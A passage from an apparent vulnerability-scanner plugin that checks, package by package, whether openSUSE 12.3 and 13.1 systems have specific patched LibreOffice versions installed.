reference:\"libreoffice-calc-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-calc-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-calc-extensions-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-debugsource-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-draw-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-draw-extensions-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-draw-extensions-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-filters-optional-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-filters-optional-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-gnome-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-gnome-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-ast-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-bg-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-ca-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-cs-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-da-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-de-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-el-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-en-GB-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-en-US-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-en-ZA-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-es-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-et-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-eu-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-fi-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-fr-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-gl-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-gu-IN-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-hi-IN-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-hu-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-it-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-ja-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-km-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-ko-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-mk-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-nb-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-nl-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-pl-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-pt-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-pt-BR-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-ru-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-sk-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-sl-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-sv-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-tr-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-vi-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-zh-CN-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-help-zh-TW-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-icon-theme-crystal-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-icon-theme-galaxy-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-icon-theme-hicontrast-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-icon-theme-oxygen-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-icon-theme-tango-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-icon-themes-prebuilt-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-impress-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-impress-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-impress-extensions-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-impress-extensions-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-kde-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-kde-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-kde4-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-kde4-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-af-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-am-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ar-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-as-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ast-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-be-BY-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-bg-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-br-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ca-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-cs-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-cy-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-da-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-de-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-el-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-en-GB-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-en-ZA-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-eo-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-es-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-et-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-eu-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-fi-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-fr-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ga-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-gd-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-gl-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-gu-IN-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-he-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-hi-IN-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-hr-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-hu-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-id-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-is-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-it-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ja-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ka-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-km-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-kn-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ko-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-lt-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-mk-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ml-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-mr-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-nb-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-nl-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-nn-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-nr-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-om-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-or-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-pa-IN-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-pl-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-prebuilt-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-pt-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-pt-BR-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ro-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ru-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-rw-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-sh-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-sk-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-sl-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-sr-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ss-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-st-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-sv-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ta-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-te-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-tg-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-th-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-tr-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ts-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ug-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-uk-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-ve-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-vi-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-xh-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-zh-CN-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-zh-TW-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-l10n-zu-3.6.3.2.4-2.9.3\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-mailmerge-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-math-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-math-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-officebean-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-officebean-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-pyuno-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-pyuno-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-sdk-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-sdk-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-writer-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-writer-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-writer-extensions-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-drivers-mysql-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-drivers-mysql-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-drivers-postgresql-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-drivers-postgresql-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-base-extensions-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-branding-upstream-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-calc-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-calc-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-calc-extensions-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-debugsource-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-draw-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-draw-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-draw-extensions-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-filters-optional-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-gnome-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-gnome-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-ast-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-bg-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-ca-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-cs-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-da-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-de-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-el-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-en-GB-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-en-US-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-en-ZA-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-es-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-et-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-eu-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-fi-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-fr-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-gl-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-gu-IN-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-hi-IN-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-hu-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-it-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-ja-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-km-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-ko-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-mk-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-nb-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-nl-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-pl-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-pt-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-pt-BR-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-ru-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-sk-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-sl-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-sv-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-tr-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-vi-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-zh-CN-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-help-zh-TW-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-icon-theme-crystal-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-icon-theme-galaxy-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-icon-theme-hicontrast-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-icon-theme-oxygen-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-icon-theme-tango-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-icon-themes-prebuilt-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-impress-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-impress-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-impress-extensions-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-impress-extensions-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-kde-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-kde-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-kde4-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-kde4-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-af-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-am-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ar-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-as-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ast-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-be-BY-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-bg-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-br-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ca-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-cs-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-cy-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-da-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-de-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-el-4.1.6.2-25.2\") ) flag++;\nif ( 